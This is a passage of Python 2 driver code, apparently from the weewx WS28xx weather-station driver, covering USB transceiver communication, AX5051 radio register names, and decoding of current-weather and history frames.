
    def toLog(self):
        """emit raw historical data"""
        logdbg("Time              %s"    % self.Time)
        logdbg("TempIndoor=       %7.1f" % self.TempIndoor)
        logdbg("HumidityIndoor=   %7.0f" % self.HumidityIndoor)
        logdbg("TempOutdoor=      %7.1f" % self.TempOutdoor)
        logdbg("HumidityOutdoor=  %7.0f" % self.HumidityOutdoor)
        logdbg("PressureRelative= %7.1f" % self.PressureRelative)
        logdbg("RainCounterRaw=   %7.3f" % self.RainCounterRaw)
        logdbg("WindSpeed=        %7.3f" % self.WindSpeed)
        logdbg("WindDirection=    % 3s" % CWeatherTraits.windDirMap[self.WindDirection])
        logdbg("Gust=             %7.3f" % self.Gust)
        logdbg("GustDirection=    % 3s" % CWeatherTraits.windDirMap[self.GustDirection])

    def asDict(self):
        """emit historical data as a dict with weewx conventions"""
        return {
            'dateTime': tstr_to_ts(str(self.Time)),
            'inTemp': self.TempIndoor,
            'inHumidity': self.HumidityIndoor,
            'outTemp': self.TempOutdoor,
            'outHumidity': self.HumidityOutdoor,
            'pressure': self.PressureRelative,
            'rain': self.RainCounterRaw / 10,  # weewx wants cm
            'windSpeed': self.WindSpeed,
            'windDir': getWindDir(self.WindDirection, self.WindSpeed),
            'windGust': self.Gust,
            'windGustDir': getWindDir(self.GustDirection, self.Gust),
            }

class HistoryCache:
    """Accumulator for history records while catching up from the station."""

    def __init__(self):
        self.clear_records()

    def clear_records(self):
        """Reset the cache to its empty initial state."""
        # counters and timestamps all start at zero
        self.since_ts = self.num_rec = self.num_scanned = self.last_ts = 0
        # index bookkeeping is unknown until the first history response
        self.start_index = self.next_index = None
        self.num_outstanding_records = None
        self.records = []

class CDataStore(object):
    """Shared state for the station protocol: transceiver settings, link
    status, station configuration, and the latest weather data."""

    class TTransceiverSettings(object):
        """Identity and radio parameters of the USB transceiver."""
        def __init__(self):
            self.VendorId = 0x6666
            self.ProductId = 0x5555
            self.VersionNo = 1
            self.manufacturer = "LA CROSSE TECHNOLOGY"
            self.product = "Weather Direct Light Wireless Device"
            self.FrequencyStandard = EFrequency.fsUS
            self.Frequency = getFrequency(self.FrequencyStandard)
            self.SerialNumber = None
            self.DeviceID = None

    class TLastStat(object):
        """Most recently observed link status and message timestamps."""
        def __init__(self):
            self.LastBatteryStatus = None
            self.LastLinkQuality = None
            self.LastHistoryIndex = None
            self.LatestHistoryIndex = None
            self.last_seen_ts = None
            self.last_weather_ts = 0
            self.last_history_ts = 0
            self.last_config_ts = 0

    def __init__(self):
        self.transceiverPresent = False
        self.commModeInterval = 3
        self.registeredDeviceID = None
        self.LastStat = CDataStore.TLastStat()
        self.TransceiverSettings = CDataStore.TTransceiverSettings()
        self.StationConfig = CWeatherStationConfig()
        self.CurrentWeather = CCurrentWeatherData()

    def getFrequencyStandard(self):
        return self.TransceiverSettings.FrequencyStandard

    def setFrequencyStandard(self, val):
        """Set the frequency standard and derive the actual frequency."""
        logdbg('setFrequency: %s' % val)
        self.TransceiverSettings.FrequencyStandard = val
        self.TransceiverSettings.Frequency = getFrequency(val)

    def getDeviceID(self):
        return self.TransceiverSettings.DeviceID

    def setDeviceID(self,val):
        logdbg("setDeviceID: %04x" % val)
        self.TransceiverSettings.DeviceID = val

    def getRegisteredDeviceID(self):
        return self.registeredDeviceID

    def setRegisteredDeviceID(self, val):
        """Record the device id the console is paired to; log on change."""
        if val != self.registeredDeviceID:
            loginf("console is paired to device with ID %04x" % val)
        self.registeredDeviceID = val

    def getTransceiverPresent(self):
        return self.transceiverPresent

    def setTransceiverPresent(self, val):
        self.transceiverPresent = val

    def setLastStatCache(self, seen_ts=None,
                         quality=None, battery=None,
                         weather_ts=None,
                         history_ts=None,
                         config_ts=None):
        """Update whichever of the cached status values were supplied;
        arguments left as None are not touched."""
        if DEBUG_COMM > 1:
            logdbg('setLastStatCache: seen=%s quality=%s battery=%s weather=%s history=%s config=%s' %
                   (seen_ts, quality, battery, weather_ts, history_ts, config_ts))
        stat = self.LastStat
        if seen_ts is not None:
            stat.last_seen_ts = seen_ts
        if quality is not None:
            stat.LastLinkQuality = quality
        if battery is not None:
            stat.LastBatteryStatus = battery
        if weather_ts is not None:
            stat.last_weather_ts = weather_ts
        if history_ts is not None:
            stat.last_history_ts = history_ts
        if config_ts is not None:
            stat.last_config_ts = config_ts

    def setLastHistoryIndex(self,val):
        self.LastStat.LastHistoryIndex = val

    def getLastHistoryIndex(self):
        return self.LastStat.LastHistoryIndex

    def setLatestHistoryIndex(self,val):
        self.LastStat.LatestHistoryIndex = val

    def getLatestHistoryIndex(self):
        return self.LastStat.LatestHistoryIndex

    def setCurrentWeather(self, data):
        self.CurrentWeather = data

    def getDeviceRegistered(self):
        """Return True only when both ids are known and they match."""
        mine = self.TransceiverSettings.DeviceID
        paired = self.registeredDeviceID
        if paired is None or mine is None:
            return False
        return paired == mine

    def getCommModeInterval(self):
        return self.commModeInterval

    def setCommModeInterval(self,val):
        logdbg("setCommModeInterval to %x" % val)
        self.commModeInterval = val

    def setTransceiverSerNo(self,val):
        logdbg("setTransceiverSerialNumber to %s" % val)
        self.TransceiverSettings.SerialNumber = val

    def getTransceiverSerNo(self):
        return self.TransceiverSettings.SerialNumber


class sHID(object):
    """USB driver abstraction"""

    def __init__(self):
        self.devh = None
        self.timeout = 1000
        self.last_dump = None

    def open(self, vid, pid, did, serial):
        device = self._find_device(vid, pid, did, serial)
        if device is None:
            logcrt('Cannot find USB device with Vendor=0x%04x ProdID=0x%04x Device=%s Serial=%s' % (vid, pid, did, serial))
            raise weewx.WeeWxIOError('Unable to find transceiver on USB')
        self._open_device(device)

    def close(self):
        self._close_device()

    def _find_device(self, vid, pid, did, serial):
        for bus in usb.busses():
            for dev in bus.devices:
                if dev.idVendor == vid and dev.idProduct == pid:
                    if did is None or dev.filename == did:
                        if serial is None:
                            loginf('found transceiver at bus=%s device=%s' %
                                   (bus.dirname, dev.filename))
                            return dev
                        else:
                            handle = dev.open()
                            try:
                                buf = self.readCfg(handle, 0x1F9, 7)
                                sn  = str("%02d" % (buf[0]))
                                sn += str("%02d" % (buf[1]))
                                sn += str("%02d" % (buf[2]))
                                sn += str("%02d" % (buf[3]))
                                sn += str("%02d" % (buf[4]))
                                sn += str("%02d" % (buf[5]))
                                sn += str("%02d" % (buf[6]))
                                if str(serial) == sn:
                                    loginf('found transceiver at bus=%s device=%s serial=%s' % (bus.dirname, dev.filename, sn))
                                    return dev
                                else:
                                    loginf('skipping transceiver with serial %s (looking for %s)' % (sn, serial))
                            finally:
                                del handle
        return None

    def _open_device(self, dev, interface=0):
        self.devh = dev.open()
        if not self.devh:
            raise weewx.WeeWxIOError('Open USB device failed')

        loginf('manufacturer: %s' % self.devh.getString(dev.iManufacturer,30))
        loginf('product: %s' % self.devh.getString(dev.iProduct,30))
        loginf('interface: %d' % interface)

        # be sure kernel does not claim the interface
        try:
            self.devh.detachKernelDriver(interface)
        except Exception:
            pass

        # attempt to claim the interface
        try:
            logdbg('claiming USB interface %d' % interface)
            self.devh.claimInterface(interface)
            self.devh.setAltInterface(interface)
        except usb.USBError, e:
            self._close_device()
            logcrt('Unable to claim USB interface %s: %s' % (interface, e))
            raise weewx.WeeWxIOError(e)

        # FIXME: this seems to be specific to ws28xx?
        # FIXME: check return values
        usbWait = 0.05
        self.devh.getDescriptor(0x1, 0, 0x12)
        time.sleep(usbWait)
        self.devh.getDescriptor(0x2, 0, 0x9)
        time.sleep(usbWait)
        self.devh.getDescriptor(0x2, 0, 0x22)
        time.sleep(usbWait)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             0xa, [], 0x0, 0x0, 1000)
        time.sleep(usbWait)
        self.devh.getDescriptor(0x22, 0, 0x2a9)
        time.sleep(usbWait)

    def _close_device(self):
        try:
            logdbg('releasing USB interface')
            self.devh.releaseInterface()
        except Exception:
            pass
        self.devh = None

    def setTX(self):
        buf = [0]*0x15
        buf[0] = 0xD1
        if DEBUG_COMM > 1:
            self.dump('setTX', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d1,
                             index=0x0000000,
                             timeout=self.timeout)

    def setRX(self):
        buf = [0]*0x15
        buf[0] = 0xD0
        if DEBUG_COMM > 1:
            self.dump('setRX', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d0,
                             index=0x0000000,
                             timeout=self.timeout)

    def getState(self,StateBuffer):
        buf = self.devh.controlMsg(requestType=usb.TYPE_CLASS |
                                   usb.RECIP_INTERFACE | usb.ENDPOINT_IN,
                                   request=usb.REQ_CLEAR_FEATURE,
                                   buffer=0x0a,
                                   value=0x00003de,
                                   index=0x0000000,
                                   timeout=self.timeout)
        if DEBUG_COMM > 1:
            self.dump('getState', buf, fmt=DEBUG_DUMP_FORMAT)
        StateBuffer[0]=[0]*0x2
        StateBuffer[0][0]=buf[1]
        StateBuffer[0][1]=buf[2]

    def readConfigFlash(self, addr, numBytes, data):
        if numBytes > 512:
            raise Exception('bad number of bytes')

        while numBytes:
            buf=[0xcc]*0x0f #0x15
            buf[0] = 0xdd
            buf[1] = 0x0a
            buf[2] = (addr >>8) & 0xFF
            buf[3] = (addr >>0) & 0xFF
            if DEBUG_COMM > 1:
                self.dump('readCfgFlash>', buf, fmt=DEBUG_DUMP_FORMAT)
            self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                                 request=0x0000009,
                                 buffer=buf,
                                 value=0x00003dd,
                                 index=0x0000000,
                                 timeout=self.timeout)
            buf = self.devh.controlMsg(requestType=usb.TYPE_CLASS |
                                       usb.RECIP_INTERFACE |
                                       usb.ENDPOINT_IN,
                                       request=usb.REQ_CLEAR_FEATURE,
                                       buffer=0x15,
                                       value=0x00003dc,
                                       index=0x0000000,
                                       timeout=self.timeout)
            new_data=[0]*0x15
            if numBytes < 16:
                for i in xrange(0, numBytes):
                    new_data[i] = buf[i+4]
                numBytes = 0
            else:
                for i in xrange(0, 16):
                    new_data[i] = buf[i+4]
                numBytes -= 16
                addr += 16
            if DEBUG_COMM > 1:
                self.dump('readCfgFlash<', buf, fmt=DEBUG_DUMP_FORMAT)
        data[0] = new_data # FIXME: new_data might be unset

    def setState(self,state):
        buf = [0]*0x15
        buf[0] = 0xd7
        buf[1] = state
        if DEBUG_COMM > 1:
            self.dump('setState', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d7,
                             index=0x0000000,
                             timeout=self.timeout)

    def setFrame(self,data,numBytes):
        buf = [0]*0x111
        buf[0] = 0xd5
        buf[1] = numBytes >> 8
        buf[2] = numBytes
        for i in xrange(0, numBytes):
            buf[i+3] = data[i]
        if DEBUG_COMM == 1:
            self.dump('setFrame', buf, 'short')
        elif DEBUG_COMM > 1:
            self.dump('setFrame', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d5,
                             index=0x0000000,
                             timeout=self.timeout)

    def getFrame(self,data,numBytes):
        buf = self.devh.controlMsg(requestType=usb.TYPE_CLASS |
                                   usb.RECIP_INTERFACE |
                                   usb.ENDPOINT_IN,
                                   request=usb.REQ_CLEAR_FEATURE,
                                   buffer=0x111,
                                   value=0x00003d6,
                                   index=0x0000000,
                                   timeout=self.timeout)
        new_data=[0]*0x131
        new_numBytes=(buf[1] << 8 | buf[2])& 0x1ff
        for i in xrange(0, new_numBytes):
            new_data[i] = buf[i+3]
        if DEBUG_COMM == 1:
            self.dump('getFrame', buf, 'short')
        elif DEBUG_COMM > 1:
            self.dump('getFrame', buf, fmt=DEBUG_DUMP_FORMAT)
        data[0] = new_data
        numBytes[0] = new_numBytes

    def writeReg(self,regAddr,data):
        buf = [0]*0x05
        buf[0] = 0xf0
        buf[1] = regAddr & 0x7F
        buf[2] = 0x01
        buf[3] = data
        buf[4] = 0x00
        if DEBUG_COMM > 1:
            self.dump('writeReg', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003f0,
                             index=0x0000000,
                             timeout=self.timeout)

    def execute(self, command):
        buf = [0]*0x0f #*0x15
        buf[0] = 0xd9
        buf[1] = command
        if DEBUG_COMM > 1:
            self.dump('execute', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d9,
                             index=0x0000000,
                             timeout=self.timeout)

    def setPreamblePattern(self,pattern):
        buf = [0]*0x15
        buf[0] = 0xd8
        buf[1] = pattern
        if DEBUG_COMM > 1:
            self.dump('setPreamble', buf, fmt=DEBUG_DUMP_FORMAT)
        self.devh.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                             request=0x0000009,
                             buffer=buf,
                             value=0x00003d8,
                             index=0x0000000,
                             timeout=self.timeout)

    # three formats, long, short, auto.  short shows only the first 16 bytes.
    # long shows the full length of the buffer.  auto shows the message length
    # as indicated by the length in the message itself for setFrame and
    # getFrame, or the first 16 bytes for any other message.
    def dump(self, cmd, buf, fmt='auto'):
        strbuf = ''
        msglen = None
        if fmt == 'auto':
            if buf[0] in [0xd5, 0x00]:
                msglen = buf[2] + 3        # use msg length for set/get frame
            else:
                msglen = 16                # otherwise do same as short format
        elif fmt == 'short':
            msglen = 16
        for i,x in enumerate(buf):
            strbuf += str('%02x ' % x)
            if (i+1) % 16 == 0:
                self.dumpstr(cmd, strbuf)
                strbuf = ''
            if msglen is not None and i+1 >= msglen:
                break
        if strbuf:
            self.dumpstr(cmd, strbuf)

    # filter output that we do not care about, pad the command string.
    def dumpstr(self, cmd, strbuf):
        pad = ' ' * (15-len(cmd))
        # de15 is idle, de14 is intermediate
        if strbuf in ['de 15 00 00 00 00 ','de 14 00 00 00 00 ']:
            if strbuf != self.last_dump or DEBUG_COMM > 2:
                logdbg('%s: %s%s' % (cmd, pad, strbuf))
            self.last_dump = strbuf
        else:
            logdbg('%s: %s%s' % (cmd, pad, strbuf))
            self.last_dump = None

    def readCfg(self, handle, addr, numBytes):
        while numBytes:
            buf=[0xcc]*0x0f #0x15
            buf[0] = 0xdd
            buf[1] = 0x0a
            buf[2] = (addr >>8) & 0xFF
            buf[3] = (addr >>0) & 0xFF
            handle.controlMsg(usb.TYPE_CLASS + usb.RECIP_INTERFACE,
                              request=0x0000009,
                              buffer=buf,
                              value=0x00003dd,
                              index=0x0000000,
                              timeout=1000)
            buf = handle.controlMsg(requestType=usb.TYPE_CLASS |
                                    usb.RECIP_INTERFACE | usb.ENDPOINT_IN,
                                    request=usb.REQ_CLEAR_FEATURE,
                                    buffer=0x15,
                                    value=0x00003dc,
                                    index=0x0000000,
                                    timeout=1000)
            new_data=[0]*0x15
            if numBytes < 16:
                for i in xrange(0, numBytes):
                    new_data[i] = buf[i+4]
                numBytes = 0
            else:
                for i in xrange(0, 16):
                    new_data[i] = buf[i+4]
                numBytes -= 16
                addr += 16
        return new_data

class CCommunicationService(object):

    reg_names = dict()

    class AX5051RegisterNames:
        """Register addresses of the AX5051 RF transceiver chip used by
        the USB dongle; written via sHID.writeReg during radio setup."""
        REVISION         = 0x0
        SCRATCH          = 0x1
        POWERMODE        = 0x2
        XTALOSC          = 0x3
        FIFOCTRL         = 0x4
        FIFODATA         = 0x5
        IRQMASK          = 0x6
        IFMODE           = 0x8
        PINCFG1          = 0x0C
        PINCFG2          = 0x0D
        MODULATION       = 0x10
        ENCODING         = 0x11
        FRAMING          = 0x12
        CRCINIT3         = 0x14
        CRCINIT2         = 0x15
        CRCINIT1         = 0x16
        CRCINIT0         = 0x17
        FREQ3            = 0x20
        FREQ2            = 0x21
        FREQ1            = 0x22
        FREQ0            = 0x23
        FSKDEV2          = 0x25
        FSKDEV1          = 0x26
        FSKDEV0          = 0x27
        IFFREQHI         = 0x28
        IFFREQLO         = 0x29
        PLLLOOP          = 0x2C
        PLLRANGING       = 0x2D
        PLLRNGCLK        = 0x2E
        TXPWR            = 0x30
        TXRATEHI         = 0x31
        TXRATEMID        = 0x32
        TXRATELO         = 0x33
        MODMISC          = 0x34
        FIFOCONTROL2     = 0x37
        ADCMISC          = 0x38
        AGCTARGET        = 0x39
        AGCATTACK        = 0x3A
        AGCDECAY         = 0x3B
        AGCCOUNTER       = 0x3C
        CICDEC           = 0x3F
        DATARATEHI       = 0x40
        DATARATELO       = 0x41
        TMGGAINHI        = 0x42
        TMGGAINLO        = 0x43
        PHASEGAIN        = 0x44
        FREQGAIN         = 0x45
        FREQGAIN2        = 0x46
        AMPLGAIN         = 0x47
        TRKFREQHI        = 0x4C
        TRKFREQLO        = 0x4D
        XTALCAP          = 0x4F
        SPAREOUT         = 0x60
        TESTOBS          = 0x68
        APEOVER          = 0x70
        TMMUX            = 0x71
        PLLVCOI          = 0x72
        PLLCPEN          = 0x73
        PLLRNGMISC       = 0x74
        AGCMANUAL        = 0x78
        ADCDCLEVEL       = 0x79
        RFMISC           = 0x7A
        TXDRIVER         = 0x7B
        REF              = 0x7C
        RXMISC           = 0x7D

    def __init__(self):
        """Set up the USB abstraction, data store, and comm-loop state."""
        logdbg('CCommunicationService.init')

        self.shid = sHID()
        self.DataStore = CDataStore()
        self.history_cache = HistoryCache()

        # adaptive polling delays, in seconds
        self.firstSleep = 1
        self.nextSleep = 1
        self.pollCount = 0

        # communication thread management
        self.running = False
        self.child = None
        self.thread_wait = 60.0 # seconds

        # the request currently being serviced
        self.command = None
        # do not set time when offset to whole hour is <= _a3_offset
        self._a3_offset = 3

    def buildFirstConfigFrame(self, Buffer, cs):
        """Compose the initial aGetConfig request into Buffer[0].

        cs is the station checksum to echo; returns the frame length."""
        logdbg('buildFirstConfigFrame: cs=%04x' % cs)
        comInt = self.DataStore.getCommModeInterval()
        historyAddress = 0xFFFFFF  # "no history" sentinel address
        Buffer[0] = [
            0xf0,
            0xf0,
            EAction.aGetConfig,
            (cs >> 8) & 0xff,
            (cs >> 0) & 0xff,
            (comInt >> 4) & 0xff,
            (historyAddress >> 16) & 0x0f | 16 * (comInt & 0xf),
            (historyAddress >> 8) & 0xff,
            (historyAddress >> 0) & 0xff,
        ]
        return 0x09

    def buildConfigFrame(self, Buffer):
        """Compose an aSendConfig frame from the local station config.

        Returns 48 when a changed config was written into Buffer[0],
        otherwise 0 (nothing to send yet)."""
        logdbg("buildConfigFrame")
        cfgBuffer = [0]
        cfgBuffer[0] = [0]*44
        if not self.DataStore.StationConfig.testConfigChanged(cfgBuffer):
            # current config not up to date; do not write yet
            return 0
        self.shid.dump('OutBuf', cfgBuffer[0], fmt='long')
        frame = [0]*48
        frame[0] = Buffer[0][0]
        frame[1] = Buffer[0][1]
        frame[2] = EAction.aSendConfig # 0x40 # change this value if we won't store config
        frame[3] = Buffer[0][3]
        # 44 bytes of config payload follow the header
        frame[4:48] = [cfgBuffer[0][i] for i in xrange(0,44)]
        Buffer[0] = frame
        return 48 # 0x30

    def buildTimeFrame(self, Buffer, cs):
        """Compose an aSendTime frame carrying the current local time in
        packed BCD; modifies Buffer[0] in place and returns the length."""
        logdbg("buildTimeFrame: cs=%04x" % cs)

        tm = time.localtime(time.time())

        # the original frame buffer is reused; only bytes 2..11 are set
        #00000000: d5 00 0c 00 32 c0 00 8f 45 25 15 91 31 20 01 00
        #00000000: d5 00 0c 00 32 c0 06 c1 47 25 15 91 31 20 01 00
        #                             3  4  5  6  7  8  9 10 11
        frame = Buffer[0]
        frame[2] = EAction.aSendTime # 0xc0
        frame[3] = (cs >> 8) & 0xFF
        frame[4] = (cs >> 0) & 0xFF
        frame[5] = (tm[5] % 10) + 0x10 * (tm[5] // 10) #sec
        frame[6] = (tm[4] % 10) + 0x10 * (tm[4] // 10) #min
        frame[7] = (tm[3] % 10) + 0x10 * (tm[3] // 10) #hour
        #DayOfWeek = tm[6] - 1; #ole from 1 - 7 - 1=Sun... 0-6 0=Sun
        DayOfWeek = tm[6]       #py  from 0 - 6 - 0=Mon
        frame[8] = DayOfWeek % 10 + 0x10 * (tm[2] % 10)           #DoW + Day
        frame[9] = (tm[2] // 10) + 0x10 * (tm[1] % 10)            #day + month
        frame[10] = (tm[1] // 10) + 0x10 * ((tm[0] - 2000) % 10)  #month + year
        frame[11] = (tm[0] - 2000) // 10                          #year
        Buffer[0] = frame
        return 0x0c

    def buildACKFrame(self, Buffer, action, cs, hidx=None):
        """Compose a 9-byte ACK frame for the given action and checksum.

        hidx is the history index to request next; when None it is taken
        from the history cache or the data store.  Returns the length (9)."""
        if DEBUG_COMM > 1:
            logdbg("buildACKFrame: action=%x cs=%04x historyIndex=%s" %
                   (action, cs, hidx))
        # first two bytes are echoed from the incoming message
        frame = [Buffer[0][0], Buffer[0][1], 0, 0, 0, 0, 0, 0, 0]

        comInt = self.DataStore.getCommModeInterval()

        # When last weather is stale, change action to get current weather
        # This is only needed during long periods of history data catchup
        if self.command == EAction.aGetHistory:
            age = int(time.time()) - self.DataStore.LastStat.last_weather_ts
            # Morphing action only with GetHistory requests,
            # and stale data after a period of twice the CommModeInterval,
            # but not with init GetHistory requests (0xF0)
            if action == EAction.aGetHistory and age >= (comInt +1) * 2 and frame[1] != 0xF0:
                if DEBUG_COMM > 0:
                    logdbg('buildACKFrame: morphing action from %d to 5 (age=%s)' % (action, age))
                action = EAction.aGetCurrent

        # resolve the history index to request
        if hidx is None:
            if self.command == EAction.aGetHistory:
                hidx = self.history_cache.next_index
            elif self.DataStore.getLastHistoryIndex() is not None:
                hidx = self.DataStore.getLastHistoryIndex()
        if hidx is not None and 0 <= hidx < WS28xxDriver.max_records:
            haddr = index_to_addr(hidx)
        else:
            haddr = 0xffffff  # sentinel: no valid history address
        if DEBUG_COMM > 1:
            logdbg('buildACKFrame: idx: %s addr: 0x%04x' % (hidx, haddr))

        frame[2] = action & 0xF
        frame[3] = (cs >> 8) & 0xFF
        frame[4] = (cs >> 0) & 0xFF
        frame[5] = (comInt >> 4) & 0xFF
        frame[6] = (haddr >> 16) & 0x0F | 16 * (comInt & 0xF)
        frame[7] = (haddr >> 8) & 0xFF
        frame[8] = (haddr >> 0) & 0xFF

        #d5 00 09 f0 f0 03 00 32 00 3f ff ff
        Buffer[0] = frame
        return 9

    def handleWsAck(self,Buffer,Length):
        """Record link quality and battery status from a station ACK."""
        logdbg('handleWsAck')
        quality = Buffer[0][3] & 0x7f
        battery = Buffer[0][2] & 0xf
        self.DataStore.setLastStatCache(seen_ts=int(time.time()),
                                        quality=quality,
                                        battery=battery)

    def handleConfig(self,Buffer,Length):
        """Decode a station config message, refresh the status cache, and
        reply with an aGetHistory request."""
        logdbg('handleConfig: %s' % self.timing())
        if DEBUG_CONFIG_DATA > 2:
            self.shid.dump('InBuf', Buffer[0], fmt='long')
        newBuffer = [Buffer[0]]
        now = int(time.time())
        self.DataStore.StationConfig.read(newBuffer)
        if DEBUG_CONFIG_DATA > 1:
            self.DataStore.StationConfig.toLog()
        self.DataStore.setLastStatCache(seen_ts=now,
                                        quality=(Buffer[0][3] & 0x7f),
                                        battery=(Buffer[0][2] & 0xf),
                                        config_ts=now)
        # the station checksum is the last two bytes of the config message
        cs = newBuffer[0][47] | (newBuffer[0][46] << 8)
        self.setSleep(0.300,0.010)
        Length[0] = self.buildACKFrame(newBuffer, EAction.aGetHistory, cs)
        Buffer[0] = newBuffer[0]

    def handleCurrentData(self,Buffer,Length):
        """Decode a current-weather message, refresh the caches, and pick
        the next request to send (get config, set config, or history)."""
        if DEBUG_WEATHER_DATA > 0:
            logdbg('handleCurrentData: %s' % self.timing())

        now = int(time.time())

        # update the weather data cache if changed or stale
        chksum = CCurrentWeatherData.calcChecksum(Buffer)
        age = now - self.DataStore.LastStat.last_weather_ts
        if age >= 10 or chksum != self.DataStore.CurrentWeather.checksum():
            if DEBUG_WEATHER_DATA > 2:
                self.shid.dump('CurWea', Buffer[0], fmt='long')
            weather = CCurrentWeatherData()
            weather.read(Buffer)
            self.DataStore.setCurrentWeather(weather)
            if DEBUG_WEATHER_DATA > 1:
                weather.toLog()

        # update the connection cache
        self.DataStore.setLastStatCache(seen_ts=now,
                                        quality=(Buffer[0][3] & 0x7f),
                                        battery=(Buffer[0][2] & 0xf),
                                        weather_ts=now)

        frame = [Buffer[0]]
        # checksum sent by the station, big-endian at bytes 4..5
        cs = frame[0][5] | (frame[0][4] << 8)

        cfgBuffer = [0]
        cfgBuffer[0] = [0]*44
        changed = self.DataStore.StationConfig.testConfigChanged(cfgBuffer)
        inBufCS = self.DataStore.StationConfig.getInBufCS()
        if inBufCS == 0 or inBufCS != cs:
            # request for a get config
            logdbg('handleCurrentData: inBufCS of station does not match')
            self.setSleep(0.300,0.010)
            Length[0] = self.buildACKFrame(frame, EAction.aGetConfig, cs)
        elif changed:
            # Request for a set config
            logdbg('handleCurrentData: outBufCS of station changed')
            self.setSleep(0.300,0.010)
            Length[0] = self.buildACKFrame(frame, EAction.aReqSetConfig, cs)
        else:
            # Request for either a history message or a current weather message
            # In general we don't use EAction.aGetCurrent to ask for a current
            # weather message; they also come when requested for
            # EAction.aGetHistory. This we learned from the Heavy Weather Pro
            # messages (via USB sniffer).
            self.setSleep(0.300,0.010)
            Length[0] = self.buildACKFrame(frame, EAction.aGetHistory, cs)

        Buffer[0] = frame[0]

    def handleHistoryData(self, buf, buflen):
        if DEBUG_HISTORY_DATA > 0:
            logdbg('handleHistoryData: %s' % self.timing())

        now = int(time.time())
        self.DataStore.setLastStatCache(seen_ts=now,
                                        quality=(buf[0][3] & 0x7f),
                                        battery=(buf[0][2] & 0xf),
                                        history_ts=now)

        newbuf = [0]
        newbuf[0] = buf[0]
        newlen = [0]
        data = CHistoryData()
        data.read(newbuf)
        if DEBUG_HISTORY_DATA > 1:
            data.toLog()

        cs = newbuf[0][5] | (newbuf[0][4] << 8)
        latestAddr = bytes_to_addr(buf[0][6], buf[0][7], buf[0][8])
        thisAddr = bytes_to_addr(buf[0][9], buf[0][10], buf[0][11])
        latestIndex = addr_to_index(latestAddr)
        thisIndex = addr_to_index(thisAddr)
        ts = tstr_to_ts(str(data.Time))

        nrec = get_index(latestIndex - thisIndex)
        logdbg('handleHistoryData: time=%s'
               ' this=%d (0x%04x) latest=%d (0x%04x) nrec=%d' %
               (data.Time, thisIndex, thisAddr, latestIndex, latestAddr, nrec))

        # track the latest history index
        self.DataStore.setLastHistoryIndex(thisIndex)
        self.DataStore.setLatestHistoryIndex(latestIndex)

        nextIndex = None
        if self.command == EAction.aGetHistory:
            if self.history_cache.start_index is None:
                nreq = 0
                if self.history_cache.num_rec > 0:
                    loginf('handleHistoryData: request for %s records' %
                           self.history_cache.num_rec)
                    nreq = self.history_cache.num_rec
                else:
                    loginf('handleHistoryData: request records since %s' %
                           weeutil.weeutil.timestamp_to_string(self.history_cache.since_ts))
                    span = int(time.time()) - self.history_cache.since_ts
                    # FIXME: what if we do not have config data yet?
                    cfg = self.getConfigData().asDict()
                    arcint = 60 * getHistoryInterval(cfg['history_interval'])
                    # FIXME: this assumes a constant archive interval for all
                    # records in the station history
                    nreq = int(span / arcint) + 5 # FIXME: punt 5
                if nreq > nrec:
                    loginf('handleHistoryData: too many records requested (%d)'
                           ', clipping to number stored (%d)' % (nreq, nrec))
                    nreq = nrec
                idx = get_index(latestIndex - nreq)
                self.history_cache.start_index = idx
                self.history_cache.next_index = idx
                self.DataStore.setLastHistoryIndex(idx)
                self.history_cache.num_outstanding_records = nreq
                logdbg('handleHistoryData: start_index=%s'
                       ' num_outstanding_records=%s' % (idx, nreq))
                nextIndex = idx
            elif self.history_cache.next_index is not None:
                # thisIndex should be the next record after next_index
                thisIndexTst = get_next_index(self.history_cache.next_index)
                if thisIndexTst == thisIndex:
                    self.history_cache.num_scanned += 1
                    # get the next history record
                    if ts is not None and self.history_cache.since_ts <= ts:
                        # Check if two records in a row with the same ts
                        if self.history_cache.last_ts == ts:
                            logdbg('handleHistoryData: remove previous record'
                                   ' with duplicate timestamp: %s' %
                                   weeutil.weeutil.timestamp_to_string(ts))
                            self.history_cache.records.pop()
                        self.history_cache.last_ts = ts
                        # append to the history
                        logdbg('handleHistoryData: appending history record'
                               ' %s: %s' % (thisIndex, data.asDict()))
                        self.history_cache.records.append(data.asDict())
                        self.history_cache.num_outstanding_records = nrec
                    elif ts is None:
                        logerr('handleHistoryData: skip record: this_ts=None')
                    else:
                        logdbg('handleHistoryData: skip record: since_ts=%s this_ts=%s' % (weeutil.weeutil.timestamp_to_string(self.history_cache.since_ts), weeutil.weeutil.timestamp_to_string(ts)))
                    self.history_cache.next_index = thisIndex
                else:
                    loginf('handleHistoryData: index mismatch: %s != %s' %
                           (thisIndexTst, thisIndex))
                nextIndex = self.history_cache.next_index

        logdbg('handleHistoryData: next=%s' % nextIndex)
        self.setSleep(0.300,0.010)
        newlen[0] = self.buildACKFrame(newbuf, EAction.aGetHistory, cs, nextIndex)

        buflen[0] = newlen[0]
        buf[0] = newbuf[0]

    def handleNextAction(self,Buffer,Length):
        """Answer a console 'request' frame (response types a1/a2/a3).

        Buffer and Length are single-element lists used as in/out
        parameters; the reply frame is written back into them.
        """
        newBuffer = [0]
        newBuffer[0] = Buffer[0]
        newLength = [0]
        newLength[0] = Length[0]
        # record time of contact and link quality (low 7 bits of byte 3)
